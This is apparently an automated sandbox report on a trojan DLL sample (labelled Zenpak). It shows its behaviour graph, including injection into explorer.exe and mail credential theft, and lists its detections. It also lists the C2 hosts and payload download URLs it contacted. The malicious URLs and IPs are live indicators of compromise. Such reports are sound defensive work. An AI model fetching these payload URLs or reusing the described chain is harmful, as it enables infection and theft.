                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Valid Accounts                      		LSA Secrets1
                      Query Registry                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Access Token Manipulation                      		Cached Domain Credentials111
                      Security Software Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items31
                      Virtualization/Sandbox Evasion                      		DCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job813
                      Process Injection                      		Proc Filesystem3
                      Process Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      Rundll32                      		/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery                      		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging3
                      System Network Configuration Discovery                      		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 620323 Sample: 2oCOO5LbPu.dll Startdate: 04/05/2022 Architecture: WINDOWS Score: 100 72 8.8.8.8.in-addr.arpa 2->72 74 1.0.0.127.in-addr.arpa 2->74 108 Snort IDS alert for network traffic 2->108 110 Found malware configuration 2->110 112 Malicious sample detected (through community Yara rule) 2->112 114 9 other signatures 2->114 12 loaddll32.exe 1 2->12         started        14 mshta.exe 19 2->14         started        signatures3 process4 process5 16 cmd.exe 1 12->16         started        18 powershell.exe 32 14->18         started        signatures6 21 rundll32.exe 1 6 16->21         started        100 Injects code into the Windows Explorer (explorer.exe) 18->100 102 Writes to foreign memory regions 18->102 104 Modifies the context of a thread in another process (thread injection) 18->104 106 2 other signatures 18->106 25 csc.exe 3 18->25         started        28 csc.exe 3 18->28         started        30 conhost.exe 18->30         started        process7 dnsIp8 76 185.189.151.28, 49761, 80 AS-SOFTPLUSCH Switzerland 21->76 116 System process connects to network (likely due to code injection or exploit) 21->116 118 Writes to foreign memory regions 21->118 120 Allocates memory in foreign processes 21->120 122 3 other signatures 21->122 32 control.exe 1 21->32         started        68 C:\Users\user\AppData\Local\...\dyznokx3.dll, PE32 25->68 dropped 35 cvtres.exe 25->35         started        70 C:\Users\user\AppData\Local\...\ykprd3xj.dll, PE32 28->70 dropped 37 cvtres.exe 1 28->37         started        file9 signatures10 process11 signatures12 92 Changes memory attributes in foreign processes to executable or writable 32->92 94 Injects code into the Windows Explorer (explorer.exe) 32->94 96 Writes to foreign memory regions 32->96 98 4 other signatures 32->98 39 explorer.exe 32->39 injected 43 rundll32.exe 32->43         started        process13 dnsIp14 86 193.56.146.127, 49823, 80 LVLT-10753US unknown 39->86 88 cabrioxmdes.at 116.121.62.237, 49825, 49836, 49845 CJNET-ASCheiljedangCoIncKR Korea Republic of 39->88 90 gamexperts.net 39->90 124 System process connects to network (likely due to code injection or exploit) 39->124 126 Tries to steal Mail credentials (via file / registry access) 39->126 128 Changes memory attributes in foreign processes to executable or writable 39->128 130 8 other signatures 39->130 45 cmd.exe 39->45         started        48 cmd.exe 39->48         started        50 cmd.exe 39->50         started        52 4 other processes 39->52 signatures15 process16 signatures17 134 Uses ping.exe to sleep 45->134 136 Uses ping.exe to check the status of other devices and networks 45->136 138 Uses nslookup.exe to query domains 45->138 54 PING.EXE 45->54         started        57 conhost.exe 45->57         started        59 nslookup.exe 48->59         started        62 conhost.exe 48->62         started        64 conhost.exe 50->64         started        66 conhost.exe 52->66         started        process18 dnsIp19 78 192.168.2.1 unknown unknown 54->78 80 222.222.67.208.in-addr.arpa 59->80 82 resolver1.opendns.com 59->82 84 myip.opendns.com 59->84 132 May check the online IP address of the machine 59->132 signatures20

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      2oCOO5LbPu.dll50%ReversingLabsWin32.Trojan.Zenpak
                      2oCOO5LbPu.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.rundll32.exe.36d0000.0.unpack100%AviraHEUR/AGEN.1245293Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      http://curlmyip.net0%Avira URL Cloudsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://curlmyip.netJv1GYc8A8hCBIeVDfile://c:0%Avira URL Cloudsafe
                      http://ns.adobp/0%Avira URL Cloudsafe
                      http://193.56.146.127/stilak32.rar100%Avira URL Cloudmalware
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://cabrioxmdes.at/images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif100%Avira URL Cloudmalware
                      http://ns.adobe.cmg0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      http://193.56.146.127/stilak64.rar100%Avira URL Cloudmalware
                      http://crl.osofts/Microt00%URL Reputationsafe
                      http://185.189.151.28/drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk0%Avira URL Cloudsafe
                      http://193.56.146.127/cook32.rar100%Avira URL Cloudmalware
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      http://185.189.151.28/drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      http://cabrioxmdes.at/images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp100%Avira URL Cloudmalware
                      https://www.pango.co/privacy0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      http://185.189.151.28/drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk0%Avira URL Cloudsafe
                      http://ns.adobe.ux0%Avira URL Cloudsafe
                      http://193.56.146.127/cook64.rar100%Avira URL Cloudmalware
                      http://ns.micro/10%Avira URL Cloudsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      http://cabrioxmdes.at/images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmp100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      l-0007.l-dc-msedge.net
                      		13.107.43.16
                      		truetrue
                        		unknown
                        cabrioxmdes.at
                        		116.121.62.237
                        		truetrue
                          		unknown
                          myip.opendns.com
                          		102.129.143.40
                          		truefalse
                            		high
                            resolver1.opendns.com
                            		208.67.222.222
                            		truefalse
                              		high
                              gamexperts.net
                              		unknown
                              		unknowntrue
                                		unknown
                                1.0.0.127.in-addr.arpa
                                		unknown
                                		unknowntrue
                                  		unknown
                                  222.222.67.208.in-addr.arpa
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    8.8.8.8.in-addr.arpa
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://193.56.146.127/stilak32.rartrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://cabrioxmdes.at/images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.giftrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://193.56.146.127/stilak64.rartrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://185.189.151.28/drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlktrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://193.56.146.127/cook32.rartrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://185.189.151.28/drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlktrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://cabrioxmdes.at/images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://185.189.151.28/drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlktrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://193.56.146.127/cook64.rartrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://cabrioxmdes.at/images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmptrue
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://www.disneyplus.com/legal/your-california-privacy-rightsRuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://nuget.org/NuGet.exepowershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://curlmyip.netRuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472890650.0000015723D2D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://curlmyip.netJv1GYc8A8hCBIeVDfile://c:RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472890650.0000015723D2D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://ns.adobp/RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://constitution.org/usdeclar.txtC:rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://contoso.com/Licensepowershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://contoso.com/Iconpowershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://ns.adobe.cmgRuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.tiktok.com/legal/report/feedbackRuntimeBroker.exe, 0000002D.00000002.779649889.000001FFC2120000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://crl.osofts/Microt0powershell.exe, 00000014.00000003.458378624.0000012326C3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://twitter.com/spotifyRuntimeBroker.exe, 0000002D.00000000.495890891.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502279870.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.495848781.000001FFC202A000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://support.hotspotshield.com/RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.disneyplus.com/legal/privacy-policyRuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://ipinfo.io/ipRuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://constitution.org/usdeclar.txtrundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://contoso.com/powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.hotspotshield.com/terms/RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.pango.co/privacyRuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://disneyplus.com/legal.RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://ns.adobe.uxRuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://ns.micro/1RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpfalse
